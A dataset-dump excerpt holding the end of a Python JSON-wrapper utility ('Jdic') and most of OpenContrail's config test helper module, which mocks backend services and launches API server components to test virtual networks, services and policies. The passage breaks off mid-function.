return res
def path(self):
""" Return the path of the current Jdic object within its hierarchy """
return self._path
def raw(self, _obj=None, _cache=False):
""" Returns a copy of the current object in basic Python types """
if _cache and 'raw' in self._cache:
return self._cache['raw']
obj = _obj if _obj else self._obj
res = type(obj)()
for key, val in jdic_enumerate(obj):
if isinstance(val, Jdic):
val = val.raw(_cache=_cache)
if isinstance(res, dict):
res[key] = val
else:
res.append(val)
self._cache['raw'] = res
return res
def validate(self, schema=None):
""" Validates the current Jdic object against a JSON schema """
if schema is not None:
return jsonschema.validate(self.raw(), schema)
elif schema is None and self._schema is not None:
return jsonschema.validate(self.raw(), self._schema)
raise ValueError('The current object is not supervised by any schema')
class JdicSequence(Jdic, Sequence):
""" A wrapper for Jdics with Sequence root types (usually list) """
class JdicMapping(Jdic, Mapping):
""" A wrapper for Jdics with Mapping root types (usually dict) """
def jdic_create(iterable, **kwargs):
""" This function returns a Jdic correctly typped according to the data root type """
if isinstance(iterable, Mapping):
return JdicMapping(iterable, **kwargs)
elif isinstance(iterable, Sequence):
return JdicSequence(iterable, **kwargs)
else:
raise ValueError('Cannot create Jdic object from "{}"'.format(type(iterable)))
def jdic_enumerate(obj, sort=False):
""" Will enumerate dicts and list in a similar fashion, to ease iterables browsing """
if isinstance(obj, Mapping):
try:
keys = sorted(obj.keys()) if sort else obj
except TypeError:
keys = sorted(dict(obj).keys()) if sort else obj
for k in keys:
yield (k, obj[k])
elif isinstance(obj, Sequence):
ind = 0
for val in obj:
yield (ind, val)
ind += 1
else:
raise TypeError('Cannot enumerate objects of type "{}"'.format(type(obj)))
| unlicense | 7,458,643,821,538,832,000 | 34.858108 | 99 | 0.554127 | false |
rombie/contrail-controller | src/config/common/tests/test_common.py | 1 | 42367 | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import gevent.monkey
gevent.monkey.patch_all()
import logging
import tempfile
import mock
from pprint import pformat
import coverage
import fixtures
import testtools
from testtools import content
from flexmock import flexmock
from webtest import TestApp
import contextlib
from netaddr import IPNetwork, IPAddress
from vnc_api.vnc_api import *
import kombu
import cfgm_common.zkclient
from cfgm_common.uve.vnc_api.ttypes import VncApiConfigLog
from cfgm_common import vnc_cgitb
from cfgm_common.utils import cgitb_hook
from test_utils import *
import bottle
bottle.catchall=False
import inspect
import novaclient
import novaclient.client
import gevent.pywsgi
import uuid
from pysandesh import sandesh_logger
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
# end lineno
try:
import vnc_cfg_api_server
if not hasattr(vnc_cfg_api_server, 'main'):
from vnc_cfg_api_server import vnc_cfg_api_server
except ImportError:
vnc_cfg_api_server = 'vnc_cfg_api_server could not be imported'
try:
import to_bgp
except ImportError:
try:
from schema_transformer import to_bgp
except ImportError:
to_bgp = 'to_bgp could not be imported'
try:
import svc_monitor
if not hasattr(svc_monitor, 'main'):
from svc_monitor import svc_monitor
except ImportError:
svc_monitor = 'svc_monitor could not be imported'
try:
import device_manager
if hasattr(device_manager, 'DeviceManager'):
import dm_server
else:
from device_manager import dm_server
from device_manager import device_manager
except ImportError:
device_manager = 'device_manager could not be imported'
try:
from kube_manager import kube_manager
if not hasattr(kube_manager, 'main'):
from kube_manager import kube_manager
except ImportError:
kube_manager = 'kube_manager could not be imported'
try:
from mesos_manager import mesos_manager
if not hasattr(mesos_manager, 'main'):
from mesos_manager import mesos_manager
except ImportError:
mesos_manager = 'mesos_manager could not be imported'
def generate_conf_file_contents(conf_sections):
cfg_parser = ConfigParser.RawConfigParser()
for (section, var, val) in conf_sections:
try:
cfg_parser.add_section(section)
except ConfigParser.DuplicateSectionError:
pass
if not var:
continue
if val == '':
cfg_parser.set(section, var, 'empty')
else:
cfg_parser.set(section, var, val)
return cfg_parser
# end generate_conf_file_contents
def generate_logconf_file_contents():
cfg_parser = ConfigParser.RawConfigParser()
cfg_parser.add_section('formatters')
cfg_parser.add_section('formatter_simple')
cfg_parser.set('formatters', 'keys', 'simple')
cfg_parser.set('formatter_simple', 'format', '%(name)s:%(levelname)s: %(message)s')
cfg_parser.add_section('handlers')
cfg_parser.add_section('handler_console')
cfg_parser.add_section('handler_api_server_file')
cfg_parser.set('handlers', 'keys', 'console,api_server_file')
cfg_parser.set('handler_console', 'class', 'StreamHandler')
cfg_parser.set('handler_console', 'level', 'WARN')
cfg_parser.set('handler_console', 'args', '[]')
cfg_parser.set('handler_console', 'formatter', 'simple')
cfg_parser.set('handler_api_server_file', 'class', 'FileHandler')
cfg_parser.set('handler_api_server_file', 'level', 'INFO')
cfg_parser.set('handler_api_server_file', 'formatter', 'simple')
cfg_parser.set('handler_api_server_file', 'args', "('api_server.log',)")
cfg_parser.add_section('loggers')
cfg_parser.add_section('logger_root')
cfg_parser.add_section('logger_FakeWSGIHandler')
cfg_parser.set('loggers', 'keys', 'root,FakeWSGIHandler')
cfg_parser.set('logger_root', 'level', 'WARN')
cfg_parser.set('logger_root', 'handlers', 'console')
cfg_parser.set('logger_FakeWSGIHandler', 'level', 'INFO')
cfg_parser.set('logger_FakeWSGIHandler', 'qualname', 'FakeWSGIHandler')
cfg_parser.set('logger_FakeWSGIHandler', 'handlers', 'api_server_file')
return cfg_parser
# end generate_logconf_file_contents
def launch_kube_manager(test_id, conf_sections, kube_api_skip, event_queue,
vnc_kubernetes_config_dict=None):
args_str = ""
vnc_cgitb.enable(format='text')
wait_for_kube_manager_down()
with tempfile.NamedTemporaryFile() as conf, tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str= ["-c", conf.name]
kube_manager.main(args_str, kube_api_skip=kube_api_skip,
event_queue=event_queue,
vnc_kubernetes_config_dict=vnc_kubernetes_config_dict)
#end launch_kube_manager
def launch_mesos_manager(test_id, conf_sections, mesos_api_skip, event_queue):
args_str = ""
vnc_cgitb.enable(format='text')
wait_for_mesos_manager_down()
with tempfile.NamedTemporaryFile() as conf, tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str= ["-c", conf.name]
mesos_manager.main(args_str, mesos_api_skip=mesos_api_skip, event_queue=event_queue)
#end launch_mesos_manager
def retry_exc_handler(tries_remaining, exception, delay):
print >> sys.stderr, "Caught '%s', %d tries remaining, sleeping for %s seconds" % (exception, tries_remaining, delay)
# end retry_exc_handler
def retries(max_tries, delay=1, backoff=2, exceptions=(Exception,), hook=None):
def dec(func):
def f2(*args, **kwargs):
mydelay = delay
tries = range(max_tries)
tries.reverse()
for tries_remaining in tries:
try:
return func(*args, **kwargs)
except exceptions as e:
if tries_remaining > 0:
if hook is not None:
hook(tries_remaining, e, mydelay)
gevent.sleep(mydelay)
mydelay = mydelay * backoff
else:
raise
else:
break
return f2
return dec
# end retries
class VncTestApp(TestApp):
def post_json(self, *args, **kwargs):
resp = super(VncTestApp, self).post_json(*args, **kwargs)
resp.charset = 'UTF-8'
return resp
#end class VncTestApp
def create_api_server_instance(test_id, config_knobs, db='cassandra'):
ret_server_info = {}
allocated_sockets = []
ret_server_info['ip'] = socket.gethostbyname(socket.gethostname())
ret_server_info['service_port'] = get_free_port(allocated_sockets)
ret_server_info['introspect_port'] = get_free_port(allocated_sockets)
ret_server_info['admin_port'] = get_free_port(allocated_sockets)
ret_server_info['allocated_sockets'] = allocated_sockets
if db == "cassandra":
ret_server_info['greenlet'] = gevent.spawn(launch_api_server,
test_id, ret_server_info['ip'], ret_server_info['service_port'],
ret_server_info['introspect_port'], ret_server_info['admin_port'],
config_knobs)
else:
msg = ("Contrail API server does not support database backend "
"'%s'" % db)
raise NotImplementedError(msg)
block_till_port_listened(ret_server_info['ip'],
ret_server_info['service_port'])
extra_env = {'HTTP_HOST': ret_server_info['ip'],
'SERVER_PORT': str(ret_server_info['service_port'])}
api_server_obj = ret_server_info['greenlet'].api_server
ret_server_info['app'] = VncTestApp(api_server_obj.api_bottle,
extra_environ=extra_env)
ret_server_info['api_conn'] = VncApi('u', 'p',
api_server_host=ret_server_info['ip'],
api_server_port=ret_server_info['service_port'])
if FakeNovaClient.vnc_lib is None:
FakeNovaClient.vnc_lib = ret_server_info['api_conn']
ret_server_info['api_session'] = requests.Session()
adapter = requests.adapters.HTTPAdapter()
ret_server_info['api_session'].mount("http://", adapter)
ret_server_info['api_session'].mount("https://", adapter)
ret_server_info['api_server'] = api_server_obj
ret_server_info['api_server']._sandesh.set_logging_level(level="SYS_DEBUG")
return ret_server_info
# end create_api_server_instance
def destroy_api_server_instance(server_info):
server_info['greenlet'].kill()
if hasattr(server_info['api_server']._db_conn, '_msgbus'):
server_info['api_server']._db_conn._msgbus.shutdown()
vhost_url = server_info['api_server']._db_conn._msgbus._urls
FakeKombu.reset(vhost_url)
FakeNovaClient.reset()
CassandraCFs.reset()
FakeKazooClient.reset()
FakeExtensionManager.reset()
for sock in server_info['allocated_sockets']:
sock.close()
# end destroy_api_server_instance
def destroy_api_server_instance_issu(server_info):
server_info['greenlet'].kill()
server_info['api_server']._db_conn._msgbus.shutdown()
vhost_url = server_info['api_server']._db_conn._msgbus._urls
for sock in server_info['allocated_sockets']:
sock.close()
# end destroy_api_server_instance
def launch_api_server(test_id, listen_ip, listen_port, http_server_port,
admin_port, conf_sections):
kombu_mock = mock.Mock()
kombu_patch = mock.patch(
'vnc_cfg_api_server.vnc_cfg_api_server.KombuAmqpClient')
kombu_init_mock = kombu_patch.start()
kombu_init_mock.side_effect = kombu_mock
args_str = ""
args_str = args_str + "--listen_ip_addr %s " % (listen_ip)
args_str = args_str + "--listen_port %s " % (listen_port)
args_str = args_str + "--http_server_port %s " % (http_server_port)
args_str = args_str + "--admin_port %s " % (admin_port)
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file api_server_%s.log " %(test_id)
args_str = args_str + "--cluster_id %s " %(test_id)
vnc_cgitb.enable(format='text')
with tempfile.NamedTemporaryFile() as conf, \
tempfile.NamedTemporaryFile() as logconf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
cfg_parser = generate_logconf_file_contents()
cfg_parser.write(logconf)
logconf.flush()
args_str = args_str + "--conf_file %s " %(conf.name)
args_str = args_str + "--logging_conf %s " %(logconf.name)
server = vnc_cfg_api_server.VncApiServer(args_str)
gevent.getcurrent().api_server = server
vnc_cfg_api_server.main(args_str, server)
# end launch_api_server
def launch_svc_monitor(cluster_id, test_id, api_server_ip, api_server_port, **extra_args):
allocated_sockets = []
args_str = ""
args_str += "--cluster_id %s " % (cluster_id)
args_str += "--api_server_ip %s " % (api_server_ip)
args_str += "--api_server_port %s " % (api_server_port)
args_str += "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str += "--cassandra_server_list 0.0.0.0:9160 "
args_str += "--log_local "
args_str += "--log_file svc_monitor_%s.log " %(test_id)
args_str += "--trace_file svc_monitor_%s.err " %(test_id)
args_str += "--check_service_interval 2 "
for name, value in extra_args.items():
args_str += "--{name} {value} ".format(name=name, value=value)
svc_monitor.main(args_str)
# end launch_svc_monitor
def kill_svc_monitor(glet):
glet.kill()
svc_monitor.SvcMonitor.reset()
def kill_schema_transformer(glet):
glet.kill()
to_bgp.SchemaTransformer.destroy_instance()
def kill_device_manager(glet):
glet.kill()
dm_server.sigterm_handler()
def kill_kube_manager(glet):
glet.kill()
kube_manager.KubeNetworkManager.destroy_instance()
def kill_mesos_manager(glet):
glet.kill()
mesos_manager.MesosNetworkManager.destroy_instance()
def reinit_schema_transformer():
for obj_cls in to_bgp.DBBaseST.get_obj_type_map().values():
obj_cls.reset()
to_bgp.transformer.reinit()
def launch_schema_transformer(cluster_id, test_id, api_server_ip,
api_server_port, extra_args=None):
allocated_sockets = []
wait_for_schema_transformer_down()
args_str = ""
args_str = args_str + "--cluster_id %s " % (cluster_id)
args_str = args_str + "--api_server_ip %s " % (api_server_ip)
args_str = args_str + "--api_server_port %s " % (api_server_port)
args_str = args_str + "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file schema_transformer_%s.log " %(test_id)
args_str = args_str + "--trace_file schema_transformer_%s.err " %(test_id)
if extra_args:
args_str = args_str + (extra_args)
to_bgp.main(args_str)
# end launch_schema_transformer
def launch_device_manager(test_id, api_server_ip, api_server_port,
conf_sections=None):
kombu_mock = mock.Mock()
kombu_patch = mock.patch(
'device_manager.dm_server.KombuAmqpClient')
kombu_init_mock = kombu_patch.start()
kombu_init_mock.side_effect = kombu_mock
wait_for_device_manager_down()
allocated_sockets = []
args_str = ""
args_str = args_str + "--cluster_id %s " % (test_id)
args_str = args_str + "--api_server_ip %s " % (api_server_ip)
args_str = args_str + "--api_server_port %s " % (api_server_port)
args_str = args_str + "--http_server_port %s " % (get_free_port(allocated_sockets))
args_str = args_str + "--cassandra_server_list 0.0.0.0:9160 "
args_str = args_str + "--log_local "
args_str = args_str + "--log_file device_manager_%s.log " %(test_id)
if conf_sections is not None:
with tempfile.NamedTemporaryFile() as conf:
cfg_parser = generate_conf_file_contents(conf_sections)
cfg_parser.write(conf)
conf.flush()
args_str = args_str + "--conf_file %s " % conf.name
dm_server.main(args_str)
else:
dm_server.main(args_str)
# end launch_device_manager
@retries(5, hook=retry_exc_handler)
def wait_for_schema_transformer_up():
if not to_bgp.SchemaTransformer.get_instance():
raise Exception("ST instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_schema_transformer_down():
if to_bgp.SchemaTransformer.get_instance():
raise Exception("ST instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_device_manager_up():
if not device_manager.DeviceManager.get_instance():
raise Exception("DM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_device_manager_down():
if device_manager.DeviceManager.get_instance():
raise Exception("DM instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_kube_manager_up():
if not kube_manager.KubeNetworkManager.get_instance():
raise Exception("KM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_kube_manager_down():
if kube_manager.KubeNetworkManager.get_instance():
raise Exception("KM instance is up, no new instances allowed")
@retries(5, hook=retry_exc_handler)
def wait_for_mesos_manager_up():
if not mesos_manager.MesosNetworkManager.get_instance():
raise Exception("MM instance is not up")
@retries(5, hook=retry_exc_handler)
def wait_for_mesos_manager_down():
if mesos_manager.MesosNetworkManager.get_instance():
raise Exception("MM instance is up, no new instances allowed")
@contextlib.contextmanager
def flexmocks(mocks):
orig_values = {}
try:
for cls, method_name, val in mocks:
kwargs = {method_name: val}
# save orig cls.method_name
orig_values[(cls, method_name)] = getattr(cls, method_name)
flexmock(cls, **kwargs)
yield
finally:
for (cls, method_name), method in orig_values.items():
setattr(cls, method_name, method)
# end flexmocks
def setup_extra_flexmock(mocks):
for (cls, method_name, val) in mocks:
kwargs = {method_name: val}
flexmock(cls, **kwargs)
# end setup_extra_flexmock
def setup_mocks(mod_attr_val_list):
# use setattr instead of flexmock because flexmocks are torndown
# after every test in stopTest whereas these mocks are needed across
# all tests in class
orig_mod_attr_val_list = []
for mod, attr, val in mod_attr_val_list:
orig_mod_attr_val_list.append(
(mod, attr, getattr(mod, attr)))
setattr(mod, attr, val)
return orig_mod_attr_val_list
#end setup_mocks
def teardown_mocks(mod_attr_val_list):
for mod, attr, val in mod_attr_val_list:
setattr(mod, attr, val)
# end teardown_mocks
@contextlib.contextmanager
def patch(target_obj, target_method_name, patched):
orig_method = getattr(target_obj, target_method_name)
def patched_wrapper(*args, **kwargs):
return patched(orig_method, *args, **kwargs)
setattr(target_obj, target_method_name, patched_wrapper)
try:
yield
finally:
setattr(target_obj, target_method_name, orig_method)
#end patch
@contextlib.contextmanager
def patch_imports(imports):
# save original, patch and restore
orig_modules = {}
mocked_modules = []
try:
for import_str, fake in imports:
cur_module = None
for mod_part in import_str.split('.'):
if not cur_module:
cur_module = mod_part
else:
cur_module += "." + mod_part
if cur_module in sys.modules:
orig_modules[cur_module] = sys.modules[cur_module]
else:
mocked_modules.append(cur_module)
sys.modules[cur_module] = fake
yield
finally:
for mod_name, mod in orig_modules.items():
sys.modules[mod_name] = mod
for mod_name in mocked_modules:
del sys.modules[mod_name]
#end patch_import
cov_handle = None
class TestCase(testtools.TestCase, fixtures.TestWithFixtures):
_HTTP_HEADERS = {
'Content-type': 'application/json; charset="UTF-8"',
}
_config_knobs = [
('DEFAULTS', '', ''),
]
mocks = [
(novaclient.client, 'Client', FakeNovaClient.initialize),
(pycassa.system_manager.Connection, '__init__',stub),
(pycassa.system_manager.SystemManager, '__new__',FakeSystemManager),
(pycassa.ConnectionPool, '__new__',FakeConnectionPool),
(pycassa.ColumnFamily, '__new__',FakeCF),
(pycassa.util, 'convert_uuid_to_time',Fake_uuid_to_time),
(kazoo.client.KazooClient, '__new__',FakeKazooClient),
(kazoo.recipe.counter.Counter, '__init__',fake_zk_counter_init),
(kazoo.recipe.counter.Counter, '_change',fake_zk_counter_change),
(kazoo.recipe.counter.Counter, 'value',fake_zk_counter_value),
(kazoo.recipe.counter.Counter, '_ensure_node',
fake_zk_counter_ensure_node),
(kazoo.handlers.gevent.SequentialGeventHandler, '__init__',stub),
(kombu.Connection, '__new__',FakeKombu.Connection),
(kombu.Exchange, '__new__',FakeKombu.Exchange),
(kombu.Queue, '__new__',FakeKombu.Queue),
(kombu.Consumer, '__new__',FakeKombu.Consumer),
(kombu.Producer, '__new__',FakeKombu.Producer),
(VncApiConfigLog, '__new__',FakeApiConfigLog),
]
def __init__(self, *args, **kwargs):
self._logger = logging.getLogger(__name__)
self._assert_till_max_tries = 600
super(TestCase, self).__init__(*args, **kwargs)
self.addOnException(self._add_detailed_traceback)
def _add_detailed_traceback(self, exc_info):
vnc_cgitb.enable(format='text')
from cStringIO import StringIO
tmp_file = StringIO()
cgitb_hook(format="text", file=tmp_file, info=exc_info)
tb_str = tmp_file.getvalue()
tmp_file.close()
self.addDetail('detailed-traceback', content.text_content(tb_str))
def _add_detail(self, detail_str):
frame = inspect.stack()[1]
self.addDetail('%s:%s ' %(frame[1],frame[2]), content.text_content(detail_str))
def _add_request_detail(self, op, url, headers=None, query_params=None,
body=None):
request_str = ' URL: ' + pformat(url) + \
' OPER: ' + pformat(op) + \
' Headers: ' + pformat(headers) + \
' Query Params: ' + pformat(query_params) + \
' Body: ' + pformat(body)
self._add_detail('Requesting: ' + request_str)
def _http_get(self, uri, query_params=None):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('GET', url, headers=self._HTTP_HEADERS,
query_params=query_params)
response = self._api_server_session.get(url, headers=self._HTTP_HEADERS,
params=query_params)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_get
def _http_post(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('POST', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.post(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_post
def _http_delete(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('DELETE', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.delete(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_delete
def _http_put(self, uri, body):
url = "http://%s:%s%s" % (self._api_server_ip, self._api_server_port, uri)
self._add_request_detail('PUT', url, headers=self._HTTP_HEADERS, body=body)
response = self._api_server_session.put(url, data=body,
headers=self._HTTP_HEADERS)
self._add_detail('Received Response: ' +
pformat(response.status_code) +
pformat(response.text))
return (response.status_code, response.text)
#end _http_put
def _create_test_objects(self, count=1, proj_obj=None):
ret_objs = []
for i in range(count):
obj_name = self.id() + '-vn-' + str(i)
obj = VirtualNetwork(obj_name, parent_obj=proj_obj)
self._add_detail('creating-object ' + obj_name)
self._vnc_lib.virtual_network_create(obj)
ret_objs.append(obj)
return ret_objs
def _create_test_object(self):
return self._create_test_objects()[0]
def _delete_test_object(self, obj):
self._vnc_lib.virtual_network_delete(id=obj.uuid)
def get_cf(self, keyspace_name, cf_name):
ks_name = '%s_%s' %(self._cluster_id, keyspace_name)
return CassandraCFs.get_cf(ks_name, cf_name)
# end get_cf
def vnc_db_has_ident(self, obj=None, id=None, type_fq_name=None):
if obj:
_type = obj.get_type()
_fq_name = obj.get_fq_name()
if id:
_type = self._vnc_lib.id_to_fq_name_type(id)
_fq_name = self._vnc_lib.id_to_fq_name(id)
if type_fq_name:
_type = type_fq_name[0]
_fq_name = type_fq_name[1]
try:
vnc_obj = self._vnc_lib._object_read(_type, _fq_name)
except NoIdError:
return None
return vnc_obj
def vnc_db_ident_has_prop(self, obj, prop_name, prop_value):
vnc_obj = self.vnc_db_has_ident(obj=obj)
if vnc_obj is None:
return False
return getattr(vnc_obj, prop_name) == prop_value
def vnc_db_ident_has_ref(self, obj, ref_name, ref_fq_name):
vnc_obj = self.vnc_db_has_ident(obj=obj)
if vnc_obj is None:
return False
refs = getattr(vnc_obj, ref_name, [])
for ref in refs:
if ref['to'] == ref_fq_name:
return True
return False
def vnc_db_doesnt_have_ident(self, obj=None, id=None, type_fq_name=None):
return not self.vnc_db_has_ident(obj=obj, id=id,
type_fq_name=type_fq_name)
def vnc_db_ident_doesnt_have_ref(self, obj, ref_name, ref_fq_name=None):
return not self.vnc_db_ident_has_ref(obj, ref_name, ref_fq_name)
def assertTill(self, expr_or_cb, *cb_args, **cb_kwargs):
tries = 0
while True:
if callable(expr_or_cb):
ret = expr_or_cb(*cb_args, **cb_kwargs)
else:
ret = eval(expr_or_cb)
if ret:
break
tries = tries + 1
if tries >= self._assert_till_max_tries:
raise Exception('Max retries')
self._logger.warn('Retrying at ' + str(inspect.stack()[1]))
gevent.sleep(0.1)
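    # Illustrative usage note (not part of the original test case; the property
    # name and value below are hypothetical): assertTill polls a callable (or an
    # eval-able expression string) every 100ms until it returns truthy, raising
    # after _assert_till_max_tries attempts, e.g.:
    #
    #     vn_obj = self._create_test_object()
    #     self.assertTill(self.vnc_db_has_ident, obj=vn_obj)
    #     self.assertTill(self.vnc_db_ident_has_prop, vn_obj, 'display_name', 'foo')
    #
    # _create_test_object, vnc_db_has_ident and vnc_db_ident_has_prop are the
    # helpers defined in this class.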
@classmethod
def setUpClass(cls, extra_mocks=None, extra_config_knobs=None,
db='cassandra'):
super(TestCase, cls).setUpClass()
global cov_handle
if not cov_handle:
cov_handle = coverage.coverage(source=['./'], omit=['.venv/*'])
#cov_handle.start()
cfgm_common.zkclient.LOG_DIR = './'
gevent.pywsgi.WSGIServer.handler_class = FakeWSGIHandler
cls.orig_mocked_values = setup_mocks(cls.mocks + (extra_mocks or []))
cls._cluster_id = cls.__name__
cls._server_info = create_api_server_instance(
cls._cluster_id, cls._config_knobs + (extra_config_knobs or []),
db=db)
try:
cls._api_server_ip = cls._server_info['ip']
cls._api_server_port = cls._server_info['service_port']
cls._api_admin_port = cls._server_info['admin_port']
cls._api_svr_greenlet = cls._server_info['greenlet']
cls._api_svr_app = cls._server_info['app']
cls._vnc_lib = cls._server_info['api_conn']
cls._api_server_session = cls._server_info['api_session']
cls._api_server = cls._server_info['api_server']
except Exception as e:
cls.tearDownClass()
raise
# end setUpClass
@classmethod
def tearDownClass(cls):
destroy_api_server_instance(cls._server_info)
teardown_mocks(cls.orig_mocked_values)
# end tearDownClass
def setUp(self, extra_mocks=None, extra_config_knobs=None):
self._logger.info("Running %s" %(self.id()))
super(TestCase, self).setUp()
# end setUp
def tearDown(self):
self._logger.info("Finished %s" %(self.id()))
self.wait_till_api_server_idle()
super(TestCase, self).tearDown()
# end tearDown
def wait_till_api_server_idle(self):
# wait for in-flight messages to be processed
if hasattr(self._api_server._db_conn, '_msgbus'):
while self._api_server._db_conn._msgbus.num_pending_messages() > 0:
gevent.sleep(0.001)
vhost_url = self._api_server._db_conn._msgbus._urls
while not FakeKombu.is_empty(vhost_url, 'vnc_config'):
gevent.sleep(0.001)
    # end wait_till_api_server_idle
def create_virtual_network(self, vn_name, vn_subnet='10.0.0.0/24'):
vn_obj = VirtualNetwork(name=vn_name)
ipam_fq_name = [
'default-domain', 'default-project', 'default-network-ipam']
ipam_obj = self._vnc_lib.network_ipam_read(fq_name=ipam_fq_name)
subnets = [vn_subnet] if isinstance(vn_subnet, basestring) else vn_subnet
subnet_infos = []
for subnet in subnets:
cidr = IPNetwork(subnet)
subnet_infos.append(
IpamSubnetType(
subnet=SubnetType(
str(cidr.network),
int(cidr.prefixlen),
),
default_gateway=str(IPAddress(cidr.last - 1)),
subnet_uuid=str(uuid.uuid4()),
)
)
subnet_data = VnSubnetsType(subnet_infos)
vn_obj.add_network_ipam(ipam_obj, subnet_data)
self._vnc_lib.virtual_network_create(vn_obj)
vn_obj.clear_pending_updates()
return vn_obj
# end create_virtual_network
def _create_service(self, vn_list, si_name, auto_policy,
create_right_port=True, **kwargs):
sa_set = None
if kwargs.get('service_virtualization_type') == 'physical-device':
pr = PhysicalRouter(si_name)
self._vnc_lib.physical_router_create(pr)
sa_set = ServiceApplianceSet('sa_set-'+si_name)
self._vnc_lib.service_appliance_set_create(sa_set)
sa = ServiceAppliance('sa-'+si_name, parent_obj=sa_set)
for if_type, _ in vn_list:
attr = ServiceApplianceInterfaceType(interface_type=if_type)
pi = PhysicalInterface('pi-'+si_name+if_type, parent_obj=pr)
self._vnc_lib.physical_interface_create(pi)
sa.add_physical_interface(pi, attr)
self._vnc_lib.service_appliance_create(sa)
sti = [ServiceTemplateInterfaceType(k) for k, _ in vn_list]
st_prop = ServiceTemplateType(
flavor='medium',
image_name='junk',
ordered_interfaces=True,
interface_type=sti, **kwargs)
service_template = ServiceTemplate(
name=si_name + 'template',
service_template_properties=st_prop)
if sa_set:
service_template.add_service_appliance_set(sa_set)
self._vnc_lib.service_template_create(service_template)
scale_out = ServiceScaleOutType()
if kwargs.get('service_mode') in ['in-network', 'in-network-nat']:
if_list = [ServiceInstanceInterfaceType(virtual_network=vn)
for _, vn in vn_list]
si_props = ServiceInstanceType(auto_policy=auto_policy,
interface_list=if_list,
scale_out=scale_out)
else:
if_list = [ServiceInstanceInterfaceType(),
ServiceInstanceInterfaceType()]
si_props = ServiceInstanceType(interface_list=if_list,
scale_out=scale_out)
service_instance = ServiceInstance(
name=si_name, service_instance_properties=si_props)
service_instance.add_service_template(service_template)
self._vnc_lib.service_instance_create(service_instance)
if kwargs.get('version') == 2:
proj = Project()
pt = PortTuple('pt-'+si_name, parent_obj=service_instance)
self._vnc_lib.port_tuple_create(pt)
for if_type, vn_name in vn_list:
if if_type == 'right' and not create_right_port:
continue
port = VirtualMachineInterface(si_name+if_type, parent_obj=proj)
vmi_props = VirtualMachineInterfacePropertiesType(
service_interface_type=if_type)
vn_obj = self._vnc_lib.virtual_network_read(fq_name_str=vn_name)
port.set_virtual_machine_interface_properties(vmi_props)
port.add_virtual_network(vn_obj)
port.add_port_tuple(pt)
self._vnc_lib.virtual_machine_interface_create(port)
        # Give the API a chance to create the iip for the port tuple's VMIs
        # before the schema transformer allocates an iip address to the
        # service chain
gevent.sleep(0.1)
return service_instance.get_fq_name_str()
def create_network_policy(self, vn1, vn2, service_list=None, mirror_service=None,
auto_policy=False, create_right_port = True, **kwargs):
vn1_name = vn1 if isinstance(vn1, basestring) else vn1.get_fq_name_str()
vn2_name = vn2 if isinstance(vn2, basestring) else vn2.get_fq_name_str()
addr1 = AddressType(virtual_network=vn1_name, subnet=kwargs.get('subnet_1'))
addr2 = AddressType(virtual_network=vn2_name, subnet=kwargs.get('subnet_2'))
port = PortType(-1, 0)
service_name_list = []
si_list = service_list or []
if service_list:
for service in si_list:
service_name_list.append(self._create_service(
[('left', vn1_name), ('right', vn2_name)], service,
auto_policy, create_right_port, **kwargs))
if mirror_service:
mirror_si = self._create_service(
[('left', vn1_name), ('right', vn2_name)], mirror_service, False,
service_mode='transparent', service_type='analyzer')
action_list = ActionListType()
if mirror_service:
mirror = MirrorActionType(analyzer_name=mirror_si)
action_list.mirror_to=mirror
if service_name_list:
action_list.apply_service=service_name_list
else:
action_list.simple_action='pass'
prule = PolicyRuleType(direction="<>", protocol="any",
src_addresses=[addr1], dst_addresses=[addr2],
src_ports=[port], dst_ports=[port],
action_list=action_list)
pentry = PolicyEntriesType([prule])
np = NetworkPolicy(str(uuid.uuid4()), network_policy_entries=pentry)
if auto_policy:
return np
self._vnc_lib.network_policy_create(np)
return np
# end create_network_policy
def create_logical_router(self, name, nb_of_attached_networks=1, **kwargs):
lr = LogicalRouter(name, **kwargs)
vns = []
vmis = []
iips = []
for idx in range(nb_of_attached_networks):
# Virtual Network
vn = self.create_virtual_network('%s-network%d' % (name, idx),
'10.%d.0.0/24' % idx)
vns.append(vn)
# Virtual Machine Interface
vmi_name = '%s-network%d-vmi' % (name, idx)
vmi = VirtualMachineInterface(
vmi_name, parent_type='project',
fq_name=['default-domain', 'default-project', vmi_name])
vmi.set_virtual_machine_interface_device_owner(
'network:router_interface')
vmi.add_virtual_network(vn)
self._vnc_lib.virtual_machine_interface_create(vmi)
lr.add_virtual_machine_interface(vmi)
vmis.append(vmi)
# Instance IP
gw_ip = vn.get_network_ipam_refs()[0]['attr'].ipam_subnets[0].\
default_gateway
